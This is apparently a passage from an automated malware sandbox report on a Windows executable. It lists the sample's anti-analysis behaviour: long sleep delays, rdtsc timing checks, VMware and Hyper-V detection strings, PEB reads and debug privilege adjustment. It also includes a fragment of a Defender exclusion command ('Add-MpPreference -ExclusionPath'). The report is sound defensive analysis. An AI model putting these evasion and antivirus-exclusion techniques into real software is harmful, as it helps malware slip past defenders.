          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -237312s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -237109s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -236546s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6388Thread sleep time: -236435s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe TID: 6376Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 7104Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_004088E0 rdtsc 1_2_004088E0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 240000Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239859Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239732Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239623Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239512Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239405Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239281Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239170Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239046Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 238903Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 238765Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 238656Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 238531Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 238421Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 238311Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 238203Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 237906Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 237312Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 237109Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 236546Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 236435Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeWindow / User API: threadDelayed 1268Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeWindow / User API: threadDelayed 928Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 240000Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239859Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239732Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 30583Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239623Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239512Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239405Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239281Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239170Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 239046Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 238903Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 238765Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 238656Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 238531Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 238421Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 238311Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 238203Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 237906Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 237312Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 237109Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 236546Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 236435Jump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.254094379.0000000002F81000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000004.00000000.265082760.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.254094379.0000000002F81000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000000.274001743.00000000011B3000.00000004.00000020.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.296079980.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.254094379.0000000002F81000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: msdt.exe, 00000012.00000002.519572932.000000000318D000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW1mYI
          Source: msdt.exe, 00000012.00000002.519548832.0000000003182000.00000004.00000020.sdmp, msdt.exe, 00000012.00000002.519325977.000000000313F000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000000.254354478.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000004.00000000.265145193.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000004.00000000.257571644.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000004.00000000.265145193.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: S9yf6BkjhTQUbHE.exe, 00000000.00000002.254094379.0000000002F81000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_004088E0 rdtsc 1_2_004088E0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B9100 mov eax, dword ptr fs:[00000030h]1_2_010B9100
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B9100 mov eax, dword ptr fs:[00000030h]1_2_010B9100
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B9100 mov eax, dword ptr fs:[00000030h]1_2_010B9100
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0113A537 mov eax, dword ptr fs:[00000030h]1_2_0113A537
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01188D34 mov eax, dword ptr fs:[00000030h]1_2_01188D34
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010D4120 mov eax, dword ptr fs:[00000030h]1_2_010D4120
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010D4120 mov eax, dword ptr fs:[00000030h]1_2_010D4120
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010D4120 mov eax, dword ptr fs:[00000030h]1_2_010D4120
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010D4120 mov eax, dword ptr fs:[00000030h]1_2_010D4120
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010D4120 mov ecx, dword ptr fs:[00000030h]1_2_010D4120
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0117E539 mov eax, dword ptr fs:[00000030h]1_2_0117E539
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E513A mov eax, dword ptr fs:[00000030h]1_2_010E513A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E513A mov eax, dword ptr fs:[00000030h]1_2_010E513A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E4D3B mov eax, dword ptr fs:[00000030h]1_2_010E4D3B
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E4D3B mov eax, dword ptr fs:[00000030h]1_2_010E4D3B
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E4D3B mov eax, dword ptr fs:[00000030h]1_2_010E4D3B
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C3D34 mov eax, dword ptr fs:[00000030h]1_2_010C3D34
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C3D34 mov eax, dword ptr fs:[00000030h]1_2_010C3D34
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C3D34 mov eax, dword ptr fs:[00000030h]1_2_010C3D34
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C3D34 mov eax, dword ptr fs:[00000030h]1_2_010C3D34
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C3D34 mov eax, dword ptr fs:[00000030h]1_2_010C3D34
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C3D34 mov eax, dword ptr fs:[00000030h]1_2_010C3D34
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C3D34 mov eax, dword ptr fs:[00000030h]1_2_010C3D34
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C3D34 mov eax, dword ptr fs:[00000030h]1_2_010C3D34
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C3D34 mov eax, dword ptr fs:[00000030h]1_2_010C3D34
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C3D34 mov eax, dword ptr fs:[00000030h]1_2_010C3D34
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C3D34 mov eax, dword ptr fs:[00000030h]1_2_010C3D34
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C3D34 mov eax, dword ptr fs:[00000030h]1_2_010C3D34
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010C3D34 mov eax, dword ptr fs:[00000030h]1_2_010C3D34
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010BAD30 mov eax, dword ptr fs:[00000030h]1_2_010BAD30
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010DB944 mov eax, dword ptr fs:[00000030h]1_2_010DB944
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010DB944 mov eax, dword ptr fs:[00000030h]1_2_010DB944
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010F3D43 mov eax, dword ptr fs:[00000030h]1_2_010F3D43
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01133540 mov eax, dword ptr fs:[00000030h]1_2_01133540
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010D7D50 mov eax, dword ptr fs:[00000030h]1_2_010D7D50
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010BC962 mov eax, dword ptr fs:[00000030h]1_2_010BC962
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010BB171 mov eax, dword ptr fs:[00000030h]1_2_010BB171
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010BB171 mov eax, dword ptr fs:[00000030h]1_2_010BB171
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010DC577 mov eax, dword ptr fs:[00000030h]1_2_010DC577
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010DC577 mov eax, dword ptr fs:[00000030h]1_2_010DC577
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B2D8A mov eax, dword ptr fs:[00000030h]1_2_010B2D8A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B2D8A mov eax, dword ptr fs:[00000030h]1_2_010B2D8A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B2D8A mov eax, dword ptr fs:[00000030h]1_2_010B2D8A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B2D8A mov eax, dword ptr fs:[00000030h]1_2_010B2D8A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010B2D8A mov eax, dword ptr fs:[00000030h]1_2_010B2D8A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010EA185 mov eax, dword ptr fs:[00000030h]1_2_010EA185
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010DC182 mov eax, dword ptr fs:[00000030h]1_2_010DC182
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E2581 mov eax, dword ptr fs:[00000030h]1_2_010E2581
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E2581 mov eax, dword ptr fs:[00000030h]1_2_010E2581
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E2581 mov eax, dword ptr fs:[00000030h]1_2_010E2581
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E2581 mov eax, dword ptr fs:[00000030h]1_2_010E2581
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010EFD9B mov eax, dword ptr fs:[00000030h]1_2_010EFD9B
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010EFD9B mov eax, dword ptr fs:[00000030h]1_2_010EFD9B
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E2990 mov eax, dword ptr fs:[00000030h]1_2_010E2990
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_011351BE mov eax, dword ptr fs:[00000030h]1_2_011351BE
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_011351BE mov eax, dword ptr fs:[00000030h]1_2_011351BE
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_011351BE mov eax, dword ptr fs:[00000030h]1_2_011351BE
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_011351BE mov eax, dword ptr fs:[00000030h]1_2_011351BE
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E61A0 mov eax, dword ptr fs:[00000030h]1_2_010E61A0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E61A0 mov eax, dword ptr fs:[00000030h]1_2_010E61A0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E35A1 mov eax, dword ptr fs:[00000030h]1_2_010E35A1
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_011805AC mov eax, dword ptr fs:[00000030h]1_2_011805AC
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_011805AC mov eax, dword ptr fs:[00000030h]1_2_011805AC
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_011369A6 mov eax, dword ptr fs:[00000030h]1_2_011369A6
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E1DB5 mov eax, dword ptr fs:[00000030h]1_2_010E1DB5
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E1DB5 mov eax, dword ptr fs:[00000030h]1_2_010E1DB5
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E1DB5 mov eax, dword ptr fs:[00000030h]1_2_010E1DB5
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01136DC9 mov eax, dword ptr fs:[00000030h]1_2_01136DC9
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01136DC9 mov eax, dword ptr fs:[00000030h]1_2_01136DC9
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01136DC9 mov eax, dword ptr fs:[00000030h]1_2_01136DC9
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01136DC9 mov ecx, dword ptr fs:[00000030h]1_2_01136DC9
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01136DC9 mov eax, dword ptr fs:[00000030h]1_2_01136DC9
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01136DC9 mov eax, dword ptr fs:[00000030h]1_2_01136DC9
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01168DF1 mov eax, dword ptr fs:[00000030h]1_2_01168DF1
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010BB1E1 mov eax, dword ptr fs:[00000030h]1_2_010BB1E1
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010BB1E1 mov eax, dword ptr fs:[00000030h]1_2_010BB1E1
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010BB1E1 mov eax, dword ptr fs:[00000030h]1_2_010BB1E1
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010CD5E0 mov eax, dword ptr fs:[00000030h]1_2_010CD5E0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010CD5E0 mov eax, dword ptr fs:[00000030h]1_2_010CD5E0
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0117FDE2 mov eax, dword ptr fs:[00000030h]1_2_0117FDE2
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0117FDE2 mov eax, dword ptr fs:[00000030h]1_2_0117FDE2
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0117FDE2 mov eax, dword ptr fs:[00000030h]1_2_0117FDE2
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0117FDE2 mov eax, dword ptr fs:[00000030h]1_2_0117FDE2
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_011441E8 mov eax, dword ptr fs:[00000030h]1_2_011441E8
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01137016 mov eax, dword ptr fs:[00000030h]1_2_01137016
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01137016 mov eax, dword ptr fs:[00000030h]1_2_01137016
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01137016 mov eax, dword ptr fs:[00000030h]1_2_01137016
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01184015 mov eax, dword ptr fs:[00000030h]1_2_01184015
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01184015 mov eax, dword ptr fs:[00000030h]1_2_01184015
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01171C06 mov eax, dword ptr fs:[00000030h]1_2_01171C06
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01171C06 mov eax, dword ptr fs:[00000030h]1_2_01171C06
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01171C06 mov eax, dword ptr fs:[00000030h]1_2_01171C06
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01171C06 mov eax, dword ptr fs:[00000030h]1_2_01171C06
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01171C06 mov eax, dword ptr fs:[00000030h]1_2_01171C06
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01171C06 mov eax, dword ptr fs:[00000030h]1_2_01171C06
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01171C06 mov eax, dword ptr fs:[00000030h]1_2_01171C06
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01171C06 mov eax, dword ptr fs:[00000030h]1_2_01171C06
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01171C06 mov eax, dword ptr fs:[00000030h]1_2_01171C06
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01171C06 mov eax, dword ptr fs:[00000030h]1_2_01171C06
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01171C06 mov eax, dword ptr fs:[00000030h]1_2_01171C06
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01171C06 mov eax, dword ptr fs:[00000030h]1_2_01171C06
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01171C06 mov eax, dword ptr fs:[00000030h]1_2_01171C06
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01171C06 mov eax, dword ptr fs:[00000030h]1_2_01171C06
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0118740D mov eax, dword ptr fs:[00000030h]1_2_0118740D
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0118740D mov eax, dword ptr fs:[00000030h]1_2_0118740D
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0118740D mov eax, dword ptr fs:[00000030h]1_2_0118740D
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01136C0A mov eax, dword ptr fs:[00000030h]1_2_01136C0A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01136C0A mov eax, dword ptr fs:[00000030h]1_2_01136C0A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01136C0A mov eax, dword ptr fs:[00000030h]1_2_01136C0A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_01136C0A mov eax, dword ptr fs:[00000030h]1_2_01136C0A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010EBC2C mov eax, dword ptr fs:[00000030h]1_2_010EBC2C
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E002D mov eax, dword ptr fs:[00000030h]1_2_010E002D
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E002D mov eax, dword ptr fs:[00000030h]1_2_010E002D
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E002D mov eax, dword ptr fs:[00000030h]1_2_010E002D
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E002D mov eax, dword ptr fs:[00000030h]1_2_010E002D
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010E002D mov eax, dword ptr fs:[00000030h]1_2_010E002D
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010CB02A mov eax, dword ptr fs:[00000030h]1_2_010CB02A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010CB02A mov eax, dword ptr fs:[00000030h]1_2_010CB02A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010CB02A mov eax, dword ptr fs:[00000030h]1_2_010CB02A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010CB02A mov eax, dword ptr fs:[00000030h]1_2_010CB02A
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0114C450 mov eax, dword ptr fs:[00000030h]1_2_0114C450
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_0114C450 mov eax, dword ptr fs:[00000030h]1_2_0114C450
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010EA44B mov eax, dword ptr fs:[00000030h]1_2_010EA44B
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010D0050 mov eax, dword ptr fs:[00000030h]1_2_010D0050
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010D0050 mov eax, dword ptr fs:[00000030h]1_2_010D0050
          Source: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exeCode function: 1_2_010D746D mov eax, dword ptr fs:[00000030h]1_2_010D746D
